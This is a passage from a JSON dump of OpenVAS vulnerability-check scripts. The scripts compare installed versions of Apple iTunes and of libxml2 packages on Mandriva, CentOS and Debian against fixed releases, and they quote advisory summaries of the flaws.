Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\ninfos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE );\nvers = infos['version'];\npath = infos['location'];\n\n## Apple iTunes version < 10.5 (10.5.0.142)\nif( version_is_less( version:vers, test_version:\"10.5.0.142\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.5.0.142\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-20T14:48:52", "bulletinFamily": "scanner", "description": "This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.", "modified": "2019-05-17T00:00:00", "published": "2011-10-20T00:00:00", "id": "OPENVAS:1361412562310802193", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802193", "title": "Apple iTunes Multiple Vulnerabilities - Oct 11", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Multiple Vulnerabilities - Oct 11\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802193\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-10-20 08:43:23 +0200 (Thu, 20 Oct 2011)\");\n script_cve_id(\"CVE-2011-0259\", \"CVE-2011-0200\", \"CVE-2011-3252\", \"CVE-2011-3219\",\n \"CVE-2011-0204\", \"CVE-2011-0215\", \"CVE-2010-1823\", \"CVE-2011-0164\",\n \"CVE-2011-0218\", \"CVE-2011-0221\", \"CVE-2011-0222\", \"CVE-2011-0223\",\n \"CVE-2011-0225\", \"CVE-2011-0232\", \"CVE-2011-0233\", \"CVE-2011-0234\",\n \"CVE-2011-0235\", \"CVE-2011-0237\", \"CVE-2011-0238\", \"CVE-2011-0240\",\n \"CVE-2011-0253\", \"CVE-2011-0254\", \"CVE-2011-0255\", \"CVE-2011-0981\",\n \"CVE-2011-0983\", \"CVE-2011-1109\", \"CVE-2011-1114\", \"CVE-2011-1115\",\n \"CVE-2011-1117\", \"CVE-2011-1121\", \"CVE-2011-1188\", \"CVE-2011-1203\",\n \"CVE-2011-1204\", \"CVE-2011-1288\", \"CVE-2011-1293\", \"CVE-2011-1296\",\n \"CVE-2011-1440\", \"CVE-2011-1449\", \"CVE-2011-1451\", \"CVE-2011-1453\",\n \"CVE-2011-1457\", \"CVE-2011-1462\", \"CVE-2011-1797\", \"CVE-2011-2338\",\n \"CVE-2011-2339\", \"CVE-2011-2341\", \"CVE-2011-2351\", \"CVE-2011-2352\",\n \"CVE-2011-2354\", \"CVE-2011-2356\", \"CVE-2011-2359\", \"CVE-2011-2788\",\n \"CVE-2011-2790\", \"CVE-2011-2792\", \"CVE-2011-2797\", \"CVE-2011-2799\",\n \"CVE-2011-2809\", \"CVE-2011-2811\", \"CVE-2011-2813\", \"CVE-2011-2814\",\n \"CVE-2011-2815\", \"CVE-2011-2816\", \"CVE-2011-2817\", \"CVE-2011-2818\",\n \"CVE-2011-2820\", \"CVE-2011-2823\", \"CVE-2011-2827\", \"CVE-2011-2831\",\n \"CVE-2011-3232\", \"CVE-2011-3233\", \"CVE-2011-3234\", \"CVE-2011-3235\",\n \"CVE-2011-3236\", \"CVE-2011-3237\", \"CVE-2011-3238\", \"CVE-2011-3239\",\n \"CVE-2011-3241\", \"CVE-2011-3244\", \"CVE-2011-1774\");\n script_bugtraq_id(50067, 48416, 50065, 50068, 48437, 48825, 43228, 46703,\n 48842, 48843, 48844, 48820, 48845, 48846, 48847, 48823,\n 48848, 48849, 48850, 48827, 48851, 48852, 48853, 46262,\n 46614, 46785, 48854, 48824, 47604, 48855, 48856, 48857,\n 48858, 51032, 48479, 48960, 49279, 49850, 49658, 50066,\n 48840, 47029);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Apple iTunes Multiple Vulnerabilities - Oct 11\");\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT4981\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/Security-announce/2011//Oct/msg00000.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code in\n the context of the user running the affected application. Failed attacks may\n cause denial of service conditions.\");\n script_tag(name:\"affected\", value:\"Apple iTunes version prior to 10.5 (10.5.0.142) on Windows\");\n script_tag(name:\"insight\", value:\"For more details about the vulnerabilities refer to the links given below.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apple Apple iTunes version 10.5 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://www.apple.com/itunes/download/\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nvers = infos['version'];\npath = infos['location'];\n\n## Apple iTunes version < 10.5 (10.5.0.142)\nif( version_is_less( version:vers, test_version:\"10.5.0.142\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"10.5.0.142\", install_path:path );\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T13:06:43", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2011-12-16T00:00:00", "id": "OPENVAS:1361412562310831506", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831506", "title": "Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2011-12/msg00013.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831506\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-16 11:12:39 +0530 (Fri, 16 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"MDVSA\", value:\"2011:188\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-3905\");\n script_name(\"Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libxml2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_(mes5|2010\\.1)\");\n script_tag(name:\"affected\", value:\"libxml2 on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been discovered and corrected in libxml2\n Off-by-one error in libxml allows remote attackers to execute arbitrary\n code or cause a denial of service (heap-based buffer overflow and\n application crash) via a crafted web site CVE-2011-0216).\n\n libxml2 allows remote attackers to cause a denial of service\n (out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\n The updated packages have been patched to correct these issues.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", rpm:\"libxml2-utils~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", rpm:\"libxml2-utils~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:55:20", "bulletinFamily": "scanner", "description": "Check for the Version of libxml2", "modified": "2017-07-06T00:00:00", "published": "2011-12-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=831506", "id": "OPENVAS:831506", "title": "Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been discovered and corrected in libxml2\n Off-by-one error in libxml allows remote attackers to execute arbitrary\n code or cause a denial of service (heap-based buffer overflow and\n application crash) via a crafted web site CVE-2011-0216).\n\n libxml2 allows remote attackers to cause a denial of service\n (out-of-bounds read) via unspecified vectors (CVE-2011-3905).\n\n The updated packages have been patched to correct these issues.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"libxml2 on Mandriva Linux 2010.1,\n Mandriva Linux 2010.1/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-12/msg00013.php\");\n script_id(831506);\n script_version(\"$Revision: 6570 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:06:35 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-12-16 11:12:39 +0530 (Fri, 16 Dec 2011)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"MDVSA\", value: \"2011:188\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-3905\");\n script_name(\"Mandriva Update for libxml2 MDVSA-2011:188 (libxml2)\");\n\n script_summary(\"Check for the Version of libxml2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", rpm:\"libxml2-utils~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.1~1.9mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2_2\", rpm:\"libxml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-utils\", rpm:\"libxml2-utils~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2_2\", rpm:\"lib64xml2_2~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xml2-devel\", rpm:\"lib64xml2-devel~2.7.7~1.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:56:19", "bulletinFamily": "scanner", "description": "Check for the Version of libxml2", "modified": "2018-01-02T00:00:00", "published": "2012-07-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881090", "id": "OPENVAS:881090", "title": "CentOS Update for libxml2 CESA-2012:0016 centos4 ", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libxml2 CESA-2012:0016 centos4 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The libxml2 library is a development toolbox providing the implementation\n of various XML standards. One of those standards is the XML Path Language\n (XPath), which is a language for addressing parts of an XML document.\n\n A heap-based buffer overflow flaw was found in the way libxml2 decoded\n entity references with long names. A remote attacker could provide a\n specially-crafted XML file that, when opened in an application linked\n against libxml2, would cause the application to crash or, potentially,\n execute arbitrary code with the privileges of the user running the\n application. (CVE-2011-3919)\n \n An off-by-one error, leading to a heap-based buffer overflow, was found in\n the way libxml2 parsed certain XML files. A remote attacker could provide a\n specially-crafted XML file that, when opened in an application linked\n against libxml2, would cause the application to crash or, potentially,\n execute arbitrary code with the privileges of the user running the\n application. (CVE-2011-0216)\n \n A flaw was found in the way libxml2 parsed certain XPath expressions. If an\n attacker were able to supply a specially-crafted XML file to an application\n using libxml2, as well as an XPath expression for that application to run\n against the crafted file, it could cause the application to crash.\n (CVE-2011-2834)\n \n Note: Red Hat does not ship any applications that use libxml2 in a way that\n would allow the CVE-2011-2834 flaw to be exploited; however, third-party\n applications may allow XPath expressions to be passed which could trigger\n this flaw.\n \n An out-of-bounds memory read flaw was found in libxml2. A remote attacker\n could provide a specially-crafted XML file that, when opened in an\n application linked against libxml2, would cause the application to crash.\n (CVE-2011-3905)\n \n All users of libxml2 are advised to upgrade to these updated packages,\n which contain backported patches to correct these issues. The desktop must\n be restarted (log out, then log back in) for this update to take effect.\";\n\ntag_affected = \"libxml2 on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-January/018369.html\");\n script_id(881090);\n script_version(\"$Revision: 8267 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-02 07:29:17 +0100 (Tue, 02 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:05:28 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0016\");\n script_name(\"CentOS Update for libxml2 CESA-2012:0016 centos4 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libxml2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"libxml2\", rpm:\"libxml2~2.6.16~12.9\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-devel\", rpm:\"libxml2-devel~2.6.16~12.9\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxml2-python\", rpm:\"libxml2-python~2.6.16~12.9\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:34", "bulletinFamily": "scanner", "description": "The remote host is missing an update to libxml2\nannounced via advisory DSA 2394-1.", "modified": "2017-07-07T00:00:00", "published": "2012-02-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=70712", "id": "OPENVAS:70712", "title": "Debian Security Advisory DSA 2394-1 (libxml2)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2394_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2394-1 (libxml2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Many security problems had been fixed in libxml2, a popular library to handle\nXML data files.\n\nCVE-2011-3919:\nJ\u00fcri Aedla discovered a heap-based buffer overflow that allows remote attackers\nto cause a denial of service or possibly have unspecified other impact via\nunknown vectors.\n\nCVE-2011-0216:\nAn Off-by-one error have been discoveried that allows remote attackers to\nexecute arbitrary code or cause a denial of service.\n\nCVE-2011-2821:\nA memory corruption (double free) bug has been identified in libxml2's XPath\nengine. Through it, it is possible to an attacker allows cause a denial of\nservice or possibly have unspecified other impact. This vulnerability does not\naffect the oldstable distribution (lenny).\n\nCVE-2011-2834:\nYang Dingning discovered a double free vulnerability related to XPath handling.\n\nCVE-2011-3905:\nAn out-of-bounds read vulnerability had been discovered, which allows remote\nattackers to cause a denial of service.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 2.6.32.dfsg-5+lenny5.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2.7.8.dfsg-2+squeeze2.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 2.7.8.dfsg-7.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.7.8.dfsg-7.\n\nWe recommend that you upgrade your libxml2 packages.\";\ntag_summary = \"The remote host is missing an update to libxml2\nannounced via advisory DSA 2394-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202394-1\";\n\nif(description)\n{\n script_id(70712);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0216\", \"CVE-2011-2821\", \"CVE-2011-2834\", \"CVE-2011-3905\", \"CVE-2011-3919\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-11 03:29:27 -0500 (Sat, 11 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2394-1 (libxml2)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n 